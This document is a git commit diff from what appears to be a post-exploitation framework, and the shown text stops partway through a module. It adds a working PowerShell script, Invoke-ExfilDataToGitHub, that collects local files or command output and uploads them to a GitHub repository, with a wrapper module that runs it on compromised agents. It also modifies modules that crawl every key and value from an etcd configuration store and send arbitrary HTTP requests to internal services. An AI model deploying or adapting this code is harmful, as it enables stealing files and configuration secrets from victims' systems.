Fix pyinstaller launcher. Update setup script
commit
e288af484e
|
@ -0,0 +1,294 @@
|
|||
function Invoke-ExfilDataToGitHub
|
||||
{
|
||||
|
||||
<#
|
||||
|
||||
.SYNOPSIS
|
||||
Use this script to exfiltrate data and files to a GitHub account.
|
||||
Using GitHub v3 REST API tutorial here
|
||||
https://channel9.msdn.com/Blogs/trevor-powershell/Automating-the-GitHub-REST-API-Using-PowerShell
|
||||
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
.PARAMETER GHUser
|
||||
GitHub Username
|
||||
|
||||
.PARAMETER GHRepo
|
||||
GitHub repository
|
||||
|
||||
.PARAMETER GHPAT
|
||||
GitHub Personal Access Token
|
||||
|
||||
.PARAMETER GHFilePath
|
||||
GitHub filepath not including the filename so eg. testfolder/
|
||||
|
||||
.PARAMETER LocalFilePath
|
||||
Local file path of files to upload
|
||||
|
||||
.PARAMETER GHFileName
|
||||
GitHub filename eg. testfile.txt
|
||||
|
||||
.PARAMETER Filter
|
||||
Local file filter eg. '*.*' to get all files (default), '*.pdf' for all pdfs, or 'file.txt, file2.docx' to get a comma-delimited list of files from that dirctory.
|
||||
|
||||
.PARAMETER Data
|
||||
Data to write to file
|
||||
|
||||
.SWITCH Recurse
|
||||
Recursively get files from subdirectories of given local filepath
|
||||
|
||||
|
||||
|
||||
.EXAMPLE
|
||||
# This example exfiltrates data to a file - keys do not work
|
||||
|
||||
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
|
||||
-GHFilePath "testfolder/" -GHFileName "testfile3" -Data (dir c:\windows | Out-String )
|
||||
.EXAMPLE
|
||||
# This example exfiltrates files from a given directory and filter
|
||||
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
|
||||
-GHFilePath "testfolder/" -LocalfilePath "C:\temp\" -Filter "*.pdf"
|
||||
|
||||
|
||||
.EXAMPLE
|
||||
# This examples exfiltrates specific files from a given directory
|
||||
Invoke-ExfilDataToGitHub -GHUser nnh100 -GHRepo exfil -GHPAT "ODJiZGI5ZjdkZTA3MzQzYWU5MGJjNDA3ZWU2NjQxNTk0MzllZ=="
|
||||
-GHFilePath "testfolder" -LocalfilePath "C:\temp" -Filter "play.pptx, test.pub, blank.docx" -Recurse
|
||||
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param(
|
||||
|
||||
[Parameter(Position = 0, Mandatory = $True)]
|
||||
[String]
|
||||
$GHUser,
|
||||
|
||||
[Parameter(Position = 1, Mandatory = $True)]
|
||||
[String]
|
||||
$GHRepo,
|
||||
|
||||
[Parameter(Position = 2, Mandatory = $True)]
|
||||
[String]
|
||||
$GHPAT, # This should be base64 encoded
|
||||
|
||||
[Parameter(Position =3, Mandatory = $True)]
|
||||
[String]
|
||||
$GHFilePath,
|
||||
|
||||
[Parameter(Position = 4, Mandatory=$True, ParameterSetName="ExfilFilesFromFilePath")]
|
||||
[String]
|
||||
$LocalFilePath,
|
||||
|
||||
[Parameter(Position = 4, Mandatory = $True, ParameterSetName="ExfilDataToFile")]
|
||||
[String]
|
||||
$GHFileName,
|
||||
|
||||
[Parameter(Position = 5, Mandatory = $True, ParameterSetName="ExfilFilesFromFilePath")]
|
||||
[String]
|
||||
$Filter = "*.*",
|
||||
|
||||
[Parameter(Position = 5, Mandatory = $True, ParameterSetName="ExfilDataToFile")]
|
||||
[String]
|
||||
$Data,
|
||||
|
||||
[Parameter(Mandatory = $False, ParameterSetName="ExfilFilesFromFilePath")]
|
||||
[switch]
|
||||
$Recurse = $False
|
||||
|
||||
|
||||
|
||||
)
|
||||
|
||||
|
||||
# Decode the GitHub Personal Access Token
|
||||
$GHPAT = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($GHPAT))
|
||||
|
||||
# Get the PAT in the correct format
|
||||
$Token = $GHUser + ":" + $GHPAT
|
||||
|
||||
# Convert this to Base64
|
||||
$Base64Token = [System.Convert]::ToBase64String([char[]]$Token)
|
||||
|
||||
$Headers = @{
|
||||
Authorization = 'Basic {0}' -f $Base64Token;
|
||||
};
|
||||
|
||||
|
||||
|
||||
#region ExfilDataToFile
|
||||
|
||||
if ($PsCmdlet.ParameterSetName -eq "ExfilDataToFile")
|
||||
{
|
||||
|
||||
# Make sure filepaths are in correct format
|
||||
if ($GHFilePath[-1] -ne "/") { $GHFilePath += "/" }
|
||||
|
||||
# Before deleting or inserting check to see if the file exists, if it does then get the sha and delete the file first
|
||||
$GHAPI = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $GHFilePath + $GHFileName
|
||||
|
||||
$Body = @{
|
||||
path = $GHFilePath + $GHFileName;
|
||||
ref = "master";
|
||||
}
|
||||
|
||||
|
||||
Try {
|
||||
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Get -ErrorAction SilentlyContinue
|
||||
# If we get here that means we were able to get the contents so get hold of the sha
|
||||
$sha = $content.sha
|
||||
|
||||
}
|
||||
Catch {
|
||||
$ErrorMessage = "Trying to get file contents: " + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage;
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Delete the file if it already exists
|
||||
if ($sha -ne $null){
|
||||
|
||||
|
||||
$Body = @{
|
||||
path = $GHFileName;
|
||||
message = "deleted file";
|
||||
sha = $sha;
|
||||
|
||||
} | ConvertTo-Json;
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Delete -ErrorAction SilentlyContinue
|
||||
}
|
||||
catch{
|
||||
$ErrorMessage = "Trying to delete file: " + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage;
|
||||
}
|
||||
}
|
||||
|
||||
# Here we are adding the file
|
||||
$Body = @{
|
||||
path = $GHFileName;
|
||||
content = [System.Convert]::ToBase64String([char[]]$Data);
|
||||
encoding = 'base64';
|
||||
message = "Commit at: " + (Get-Date);
|
||||
} | ConvertTo-Json;
|
||||
|
||||
try{
|
||||
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Put -ErrorAction SilentlyContinue
|
||||
}
|
||||
catch{
|
||||
$ErrorMessage = "Trying to create file: " + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
#endregion
|
||||
|
||||
|
||||
#region ExfilFilesFromFilePath
|
||||
|
||||
|
||||
if ($PsCmdlet.ParameterSetName -eq "ExfilFilesFromFilePath")
|
||||
{
|
||||
|
||||
# Make sure filepaths are in correct format
|
||||
if ($GHFilePath[-1] -ne "/") { $GHFilePath += "/" }
|
||||
if ($LocalFilePath[-1] -ne "\") { $LocalFilePath += "\" }
|
||||
|
||||
# Get the collection of files from the filter
|
||||
$Files = @()
|
||||
|
||||
$Filters = $Filter.Split(',')
|
||||
|
||||
ForEach ($fil in $Filters) {
|
||||
|
||||
# Check if files should be recursively retrieved
|
||||
if ($Recurse -eq $True){
|
||||
Get-ChildItem -Recurse ($LocalFilePath + $fil.Trim()) | ForEach-Object { $Files += $_ }
|
||||
}
|
||||
elseif ($Recurse -eq $False) {
|
||||
Get-ChildItem ($LocalFilePath + $fil.Trim()) | ForEach-Object { $Files += $_ }
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
ForEach ($file in $Files){
|
||||
|
||||
Try {
|
||||
|
||||
# Construct the API URL
|
||||
$GHAPI = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $GHFilePath + $file.Name
|
||||
|
||||
|
||||
# Check to see if the file already exists
|
||||
$Body = @{
|
||||
path = $GHFilePath + $file.Name;
|
||||
ref = "master";
|
||||
}
|
||||
|
||||
Try {
|
||||
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Get -ErrorAction SilentlyContinue
|
||||
# If we get here that means we were able to get the contents so get hold of the sha
|
||||
$sha = $content.sha
|
||||
}
|
||||
Catch {
|
||||
$ErrorMessage = "Trying to get file contents: " + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage;
|
||||
}
|
||||
|
||||
# Delete the file if it already exists
|
||||
if ($sha -ne $null){
|
||||
|
||||
$Body = @{
|
||||
path = $file.Name;
|
||||
message = "deleted file";
|
||||
sha = $sha;
|
||||
} | ConvertTo-Json;
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Delete -ErrorAction SilentlyContinue
|
||||
}
|
||||
catch{
|
||||
$ErrorMessage = "Trying to delete file: " + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage;
|
||||
}
|
||||
}
|
||||
|
||||
# Upload the file
|
||||
# Get the file as a byte array
|
||||
$FileBytes = Get-Content -Path $file.FullName -Encoding Byte
|
||||
# Base 64 encode the byte array
|
||||
$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes)
|
||||
|
||||
# Set the body context for GitHub
|
||||
$Body = @{
|
||||
path = $file.Name
|
||||
content = $Base64EncodedFileBytes;
|
||||
encoding = 'base64'
|
||||
message = "Commit at: " + (Get-Date);
|
||||
} | ConvertTo-Json
|
||||
|
||||
$content = Invoke-RestMethod -Headers $Headers -Uri $GHAPI -Body $Body -Method Put -ErrorAction SilentlyContinue | Write-Output
|
||||
|
||||
|
||||
}
|
||||
Catch {
|
||||
$ErrorMessage = "Trying to upload file " + $file.FullName + " :" + $_.Exception.Message;
|
||||
Write-Error $ErrorMessage
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
#endregion
|
||||
|
||||
}
|
|
@ -0,0 +1,146 @@
|
|||
from lib.common import helpers
|
||||
|
||||
class Module:
|
||||
|
||||
def __init__(self, mainMenu, params=[]):
|
||||
|
||||
# metadata info about the module, not modified during runtime
|
||||
self.info = {
|
||||
# name for the module that will appear in module menus
|
||||
'Name': 'Invoke-ExfilDataToGitHub',
|
||||
|
||||
# list of one or more authors for the module
|
||||
'Author': ['Nga Hoang'],
|
||||
|
||||
# more verbose multi-line description of the module
|
||||
'Description': ('Use this module to exfil files and data to GitHub. '
|
||||
'Requires the pre-generation of a GitHub Personal Access Token.'),
|
||||
|
||||
# True if the module needs to run in the background
|
||||
'Background' : False,
|
||||
|
||||
# File extension to save the file as
|
||||
'OutputExtension' : None,
|
||||
|
||||
# True if the module needs admin rights to run
|
||||
'NeedsAdmin' : False,
|
||||
|
||||
# True if the method doesn't touch disk/is reasonably opsec safe
|
||||
# Disabled - this can be a relatively noisy module but sometimes useful
|
||||
'OpsecSafe' : True,
|
||||
|
||||
'Language' : 'powershell',
|
||||
|
||||
# The minimum PowerShell version needed for the module to run
|
||||
'MinLanguageVersion' : '3',
|
||||
|
||||
# list of any references/other comments
|
||||
'Comments': [
|
||||
'https://github.com/nnh100/exfil'
|
||||
]
|
||||
}
|
||||
|
||||
# any options needed by the module, settable during runtime
|
||||
self.options = {
|
||||
# format:
|
||||
# value_name : {description, required, default_value}
|
||||
'Agent' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'Agent to run module on',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'GHUser' : {
|
||||
'Description' : 'GitHub Username',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'GHRepo' : {
|
||||
'Description' : 'GitHub Repository',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'GHPAT' : {
|
||||
'Description' : 'GitHub Personal Access Token base64 encoded',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'GHFilePath' : {
|
||||
'Description' : 'GitHub filepath not including the filename so eg. testfolder/',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'LocalFilePath' : {
|
||||
'Description' : 'Local file path of files to upload ',
|
||||
'Required' : False,
|
||||
'Value' : ''
|
||||
},
|
||||
'GHFileName' : {
|
||||
'Description' : 'GitHub filename eg. testfile.txt',
|
||||
'Required' : False,
|
||||
'Value' : ''
|
||||
},
|
||||
'Filter' : {
|
||||
'Description' : 'Local file filter eg. *.* to get all files or *.pdf for all pdfs',
|
||||
'Required' : False,
|
||||
'Value' : ''
|
||||
},
|
||||
'Data' : {
|
||||
'Description' : 'Data to write to file',
|
||||
'Required' : False,
|
||||
'Value' : ''
|
||||
},
|
||||
'Recurse' : {
|
||||
'Description' : 'Recursively get files in subfolders eg. set True or leave blank (do not use for Data exfil) ',
|
||||
'Required' : False,
|
||||
'Value' : ''
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# save off a copy of the mainMenu object to access external functionality
|
||||
# like listeners/agent handlers/etc.
|
||||
self.mainMenu = mainMenu
|
||||
|
||||
# During instantiation, any settable option parameters
|
||||
# are passed as an object set to the module and the
|
||||
# options dictionary is automatically set. This is mostly
|
||||
# in case options are passed on the command line
|
||||
if params:
|
||||
for param in params:
|
||||
# parameter format is [Name, Value]
|
||||
option, value = param
|
||||
if option in self.options:
|
||||
self.options[option]['Value'] = value
|
||||
|
||||
|
||||
def generate(self):
|
||||
# if you're reading in a large, external script that might be updates,
|
||||
# use the pattern below
|
||||
# read in the common module source code
|
||||
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1"
|
||||
try:
|
||||
f = open(moduleSource, 'r')
|
||||
except:
|
||||
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
|
||||
return ""
|
||||
|
||||
moduleCode = f.read()
|
||||
f.close()
|
||||
|
||||
script = moduleCode
|
||||
|
||||
# Need to actually run the module that has been loaded
|
||||
script += 'Invoke-ExfilDataToGitHub'
|
||||
|
||||
# add any arguments to the end execution of the script
|
||||
for option,values in self.options.iteritems():
|
||||
if option.lower() != "agent":
|
||||
if values['Value'] and values['Value'] != '':
|
||||
if values['Value'].lower() == "true":
|
||||
# if we're just adding a switch
|
||||
script += " -" + str(option)
|
||||
else:
|
||||
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
|
||||
|
||||
return script
|
|
@ -47,7 +47,7 @@ class Module:
|
|||
# value_name : {description, required, default_value}
|
||||
'Agent' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'Agent to grab a screenshot from.',
|
||||
'Description' : 'Agent to run smbautobrute from.',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
|
|
|
@ -7,26 +7,26 @@ class Module:
|
|||
# metadata info about the module, not modified during runtime
|
||||
self.info = {
|
||||
# name for the module that will appear in module menus
|
||||
'Name': 'Chronos API List Jobs',
|
||||
'Name': 'Etcd Crawler',
|
||||
|
||||
# list of one or more authors for the module
|
||||
'Author': ['@TweekFawkes'],
|
||||
'Author': ["@scottjpack",'@TweekFawkes'],
|
||||
|
||||
# more verbose multi-line description of the module
|
||||
'Description': ('List Chronos jobs using the HTTP API service for the Chronos Framework'),
|
||||
'Description': ('Pull keys and values from an etcd configuration store'),
|
||||
|
||||
# True if the module needs to run in the background
|
||||
'Background' : False,
|
||||
'Background' : True,
|
||||
|
||||
# File extension to save the file as
|
||||
'OutputExtension': "json",
|
||||
'OutputExtension': "",
|
||||
|
||||
# if the module needs administrative privileges
|
||||
'NeedsAdmin' : False,
|
||||
|
||||
# True if the method doesn't touch disk/is reasonably opsec safe
|
||||
'OpsecSafe' : True,
|
||||
|
||||
|
||||
# the module language
|
||||
'Language' : 'python',
|
||||
|
||||
|
@ -34,7 +34,7 @@ class Module:
|
|||
'MinLanguageVersion' : '2.6',
|
||||
|
||||
# list of any references/other comments
|
||||
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
|
||||
'Comments': ["Docs: https://coreos.com/etcd/docs/latest/api.html"]
|
||||
}
|
||||
|
||||
# any options needed by the module, settable during runtime
|
||||
|
@ -51,13 +51,19 @@ class Module:
|
|||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
|
||||
'Required' : True,
|
||||
'Value' : 'chronos.mesos'
|
||||
'Value' : 'etcd.mesos'
|
||||
},
|
||||
'Port' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The port to connect to.',
|
||||
'Description' : 'The etcd client communication port, typically 2379 or 1026.',
|
||||
'Required' : True,
|
||||
'Value' : '8080'
|
||||
'Value' : '1026'
|
||||
},
|
||||
'Depth' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'How far into the ETCD hierarchy to recurse. 0 for root keys only, "-1" for no limitation',
|
||||
'Required' : True,
|
||||
'Value' : '-1'
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -71,6 +77,7 @@ class Module:
|
|||
# in case options are passed on the command line
|
||||
if params:
|
||||
for param in params:
|
||||
# parameter format is [Name, Value]
|
||||
option, value = param
|
||||
if option in self.options:
|
||||
self.options[option]['Value'] = value
|
||||
|
@ -78,28 +85,51 @@ class Module:
|
|||
|
||||
def generate(self):
|
||||
target = self.options['Target']['Value']
|
||||
port = self.options['Port']['Value']
|
||||
|
||||
#port = self.options['Port']['Value']
|
||||
#print str("port: " + port)
|
||||
#depth = self.options['Depth']['Value']
|
||||
#print str("depth: " + port)
|
||||
#if not type(depth) == type(1):
|
||||
# depth = int(depth)
|
||||
#if not type(port) == type(1):
|
||||
# port = int(port)
|
||||
port = self.options['Port']['Value']
|
||||
depth = self.options['Depth']['Value']
|
||||
#print str("target: " + target)
|
||||
#print str("port: " + port)
|
||||
#print str("depth: " + depth)
|
||||
|
||||
script = """
|
||||
import urllib2
|
||||
import json
|
||||
|
||||
target = "%s"
|
||||
port = "%s"
|
||||
depth = "%s"
|
||||
|
||||
url = "http://" + target + ":" + port + "/scheduler/jobs"
|
||||
def get_etcd_keys(target, port, path, depth):
|
||||
keys = {}
|
||||
resp = urllib2.urlopen("http://" + target + ":" + port + "/v2/keys" + path)
|
||||
r = resp.read()
|
||||
r = json.loads(r)
|
||||
for n in r['node']['nodes']:
|
||||
if "dir" in n.keys() and (depth>0):
|
||||
keys.update(get_etcd_keys(target, port, n['key'], depth-1))
|
||||
elif "dir" in n.keys() and (depth == -1):
|
||||
keys.update(get_etcd_keys(target, port, n['key'], depth))
|
||||
elif "value" in n.keys():
|
||||
keys[n['key']] = n['value']
|
||||
else:
|
||||
keys[n['key']] = "directory"
|
||||
return keys
|
||||
|
||||
try:
|
||||
request = urllib2.Request(url)
|
||||
request.add_header('User-Agent',
|
||||
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
|
||||
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
|
||||
opener = urllib2.build_opener(urllib2.HTTPHandler)
|
||||
content = opener.open(request).read()
|
||||
print str(content)
|
||||
except Exception as e:
|
||||
print "Failure sending payload: " + str(e)
|
||||
def main():
|
||||
k = get_etcd_keys(target, port, "/", depth)
|
||||
print str(k)
|
||||
|
||||
""" %(target, port)
|
||||
main()
|
||||
|
||||
|
||||
""" % (target, port, depth)
|
||||
|
||||
return script
|
|
@ -1,106 +0,0 @@
|
|||
from lib.common import helpers
|
||||
|
||||
class Module:
|
||||
|
||||
def __init__(self, mainMenu, params=[]):
|
||||
|
||||
# metadata info about the module, not modified during runtime
|
||||
self.info = {
|
||||
# name for the module that will appear in module menus
|
||||
'Name': 'Marathon API List Apps',
|
||||
|
||||
# list of one or more authors for the module
|
||||
'Author': ['@scottjpack','@TweekFawkes'],
|
||||
|
||||
# more verbose multi-line description of the module
|
||||
'Description': ('List Marathon Apps using Marathon\'s REST API'),
|
||||
|
||||
# True if the module needs to run in the background
|
||||
'Background' : False,
|
||||
|
||||
# File extension to save the file as
|
||||
'OutputExtension': "json",
|
||||
|
||||
# if the module needs administrative privileges
|
||||
'NeedsAdmin' : False,
|
||||
|
||||
# True if the method doesn't touch disk/is reasonably opsec safe
|
||||
'OpsecSafe' : True,
|
||||
|
||||
# the module language
|
||||
'Language' : 'python',
|
||||
|
||||
# the minimum language version needed
|
||||
'MinLanguageVersion' : '2.6',
|
||||
|
||||
# list of any references/other comments
|
||||
'Comments': ["Marathon REST API documentation version 2.0: https://mesosphere.github.io/marathon/docs/generated/api.html", "Marathon REST API: https://mesosphere.github.io/marathon/docs/rest-api.html", "Marathon REST API: https://open.mesosphere.com/advanced-course/marathon-rest-api/"]
|
||||
}
|
||||
|
||||
# any options needed by the module, settable during runtime
|
||||
self.options = {
|
||||
# format:
|
||||
# value_name : {description, required, default_value}
|
||||
'Agent' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'Agent to execute module on.',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'Target' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
|
||||
'Required' : True,
|
||||
'Value' : 'marathon.mesos'
|
||||
},
|
||||
'Port' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The port to connect to.',
|
||||
'Required' : True,
|
||||
'Value' : '8080'
|
||||
}
|
||||
}
|
||||
|
||||
# save off a copy of the mainMenu object to access external functionality
|
||||
# like listeners/agent handlers/etc.
|
||||
self.mainMenu = mainMenu
|
||||
|
||||
# During instantiation, any settable option parameters
|
||||
# are passed as an object set to the module and the
|
||||
# options dictionary is automatically set. This is mostly
|
||||
# in case options are passed on the command line
|
||||
if params:
|
||||
for param in params:
|
||||
option, value = param
|
||||
if option in self.options:
|
||||
self.options[option]['Value'] = value
|
||||
|
||||
|
||||
def generate(self):
|
||||
target = self.options['Target']['Value']
|
||||
port = self.options['Port']['Value']
|
||||
|
||||
script = """
|
||||
import urllib2
|
||||
|
||||
target = "%s"
|
||||
port = "%s"
|
||||
|
||||
url = "http://" + target + ":" + port + "/v2/apps"
|
||||
|
||||
try:
|
||||
request = urllib2.Request(url)
|
||||
request.add_header('User-Agent',
|
||||
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
|
||||
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
|
||||
request.add_header('Content-Type', 'application/json')
|
||||
opener = urllib2.build_opener(urllib2.HTTPHandler)
|
||||
content = opener.open(request).read()
|
||||
print str(content)
|
||||
except Exception as e:
|
||||
print "Failure sending payload: " + str(e)
|
||||
|
||||
print "Finished"
|
||||
""" %(target, port)
|
||||
|
||||
return script
|
|
@ -1,105 +0,0 @@
|
|||
from lib.common import helpers
|
||||
|
||||
class Module:
|
||||
|
||||
def __init__(self, mainMenu, params=[]):
|
||||
|
||||
# metadata info about the module, not modified during runtime
|
||||
self.info = {
|
||||
# name for the module that will appear in module menus
|
||||
'Name': 'Mesos Master API List Slaves',
|
||||
|
||||
# list of one or more authors for the module
|
||||
'Author': ['@scottjpack', '@TweekFawkes'],
|
||||
|
||||
# more verbose multi-line description of the module
|
||||
'Description': ('List Mesos Agents/Slaves using the HTTP API for the Mesos Master service'),
|
||||
|
||||
# True if the module needs to run in the background
|
||||
'Background' : False,
|
||||
|
||||
# File extension to save the file as
|
||||
'OutputExtension': "json",
|
||||
|
||||
# if the module needs administrative privileges
|
||||
'NeedsAdmin' : False,
|
||||
|
||||
# True if the method doesn't touch disk/is reasonably opsec safe
|
||||
'OpsecSafe' : True,
|
||||
|
||||
# the module language
|
||||
'Language' : 'python',
|
||||
|
||||
# the minimum language version needed
|
||||
'MinLanguageVersion' : '2.6',
|
||||
|
||||
# list of any references/other comments
|
||||
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
|
||||
}
|
||||
|
||||
# any options needed by the module, settable during runtime
|
||||
self.options = {
|
||||
# format:
|
||||
# value_name : {description, required, default_value}
|
||||
'Agent' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'Agent to execute module on.',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'Target' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
|
||||
'Required' : True,
|
||||
'Value' : 'master.mesos'
|
||||
},
|
||||
'Port' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The port to connect to.',
|
||||
'Required' : True,
|
||||
'Value' : '5050'
|
||||
}
|
||||
}
|
||||
|
||||
# save off a copy of the mainMenu object to access external functionality
|
||||
# like listeners/agent handlers/etc.
|
||||
self.mainMenu = mainMenu
|
||||
|
||||
# During instantiation, any settable option parameters
|
||||
# are passed as an object set to the module and the
|
||||
# options dictionary is automatically set. This is mostly
|
||||
# in case options are passed on the command line
|
||||
if params:
|
||||
for param in params:
|
||||
option, value = param
|
||||
if option in self.options:
|
||||
self.options[option]['Value'] = value
|
||||
|
||||
|
||||
def generate(self):
|
||||
target = self.options['Target']['Value']
|
||||
port = self.options['Port']['Value']
|
||||
|
||||
|
||||
script = """
|
||||
import urllib2
|
||||
|
||||
target = "%s"
|
||||
port = "%s"
|
||||
|
||||
url = "http://" + target + ":" + port + "/slaves"
|
||||
|
||||
try:
|
||||
request = urllib2.Request(url)
|
||||
request.add_header('User-Agent',
|
||||
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
|
||||
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
|
||||
opener = urllib2.build_opener(urllib2.HTTPHandler)
|
||||
content = opener.open(request).read()
|
||||
print str(content)
|
||||
except Exception as e:
|
||||
print "Failure sending payload: " + str(e)
|
||||
|
||||
""" %(target, port)
|
||||
|
||||
return script
|
|
@ -7,19 +7,19 @@ class Module:
|
|||
# metadata info about the module, not modified during runtime
|
||||
self.info = {
|
||||
# name for the module that will appear in module menus
|
||||
'Name': 'Mesos DNS API Enumeration',
|
||||
'Name': 'HTTP REST API',
|
||||
|
||||
# list of one or more authors for the module
|
||||
'Author': ['@TweekFawkes'],
|
||||
'Author': ['@TweekFawkes',"@scottjpack"],
|
||||
|
||||
# more verbose multi-line description of the module
|
||||
'Description': ('Enumerate Mesos DNS information using the HTTP API for the Mesos DNS service'),
|
||||
'Description': ('Interacts with a HTTP REST API and returns the results back to the screen.'),
|
||||
|
||||
# True if the module needs to run in the background
|
||||
'Background' : False,
|
||||
'Background' : True,
|
||||
|
||||
# File extension to save the file as
|
||||
'OutputExtension': "json",
|
||||
'OutputExtension': "",
|
||||
|
||||
# if the module needs administrative privileges
|
||||
'NeedsAdmin' : False,
|
||||
|
@ -34,7 +34,7 @@ class Module:
|
|||
'MinLanguageVersion' : '2.6',
|
||||
|
||||
# list of any references/other comments
|
||||
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
|
||||
'Comments': ["Docs: https://mesos.github.io/chronos/docs/api.html", "urllib2 DELETE method credits to: http://stackoverflow.com/questions/21243834/doing-put-using-python-urllib2"]
|
||||
}
|
||||
|
||||
# any options needed by the module, settable during runtime
|
||||
|
@ -47,17 +47,35 @@ class Module:
|
|||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'Protocol' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'Protocol or Scheme to use.',
|
||||
'Required' : True,
|
||||
'Value' : 'http'
|
||||
},
|
||||
'Target' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
|
||||
'Description' : 'FQDN, domain name, or hostname of the remote target.',
|
||||
'Required' : True,
|
||||
'Value' : 'master.mesos'
|
||||
},
|
||||
'Port' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The port to scan for.',
|
||||
'Description' : 'The port to connect to.',
|
||||
'Required' : True,
|
||||
'Value' : '8123'
|
||||
},
|
||||
'Path' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The path.',
|
||||
'Required' : True,
|
||||
'Value' : '/v1/version'
|
||||
},
|
||||
'RequMethod' : {
|
||||
# The 'Agent' option is the only one that MUST be in a module
|
||||
'Description' : 'The HTTP request method to use.',
|
||||
'Required' : True,
|
||||
'Value' : 'GET'
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -78,20 +96,39 @@ class Module:
|
|||
|
||||
|
||||
def generate(self):
|
||||
protocol = self.options['Protocol']['Value']
|
||||
target = self.options['Target']['Value']
|
||||
port = self.options['Port']['Value']
|
||||
|
||||
path = self.options['Path']['Value']
|
||||
requmethod = self.options['RequMethod']['Value']
|
||||
|
||||
script = """
|
||||
import urllib2
|
||||
|
||||
protocol = "%s"
|
||||
target = "%s"
|
||||
port = "%s"
|
||||
path = "%s"
|
||||
requmethod = "%s"
|
||||
|
||||
url = "http://" + target + ":" + port + "/v1/enumerate"
|
||||
url = protocol + "://" + target + ":" + port + path
|
||||
|
||||
class MethodRequest(urllib2.Request):
|
||||
def __init__(self, *args, **kwargs):
|
||||
if 'method' in kwargs:
|
||||
self._method = kwargs['method']
|
||||
del kwargs['method']
|
||||
else:
|
||||
self._method = None
|
||||
return urllib2.Request.__init__(self, *args, **kwargs)
|
||||
|
||||
def get_method(self, *args, **kwargs):
|
||||
if self._method is not None:
|
||||
return self._method
|
||||
return urllib2.Request.get_method(self, *args, **kwargs)
|
||||
|
||||
try:
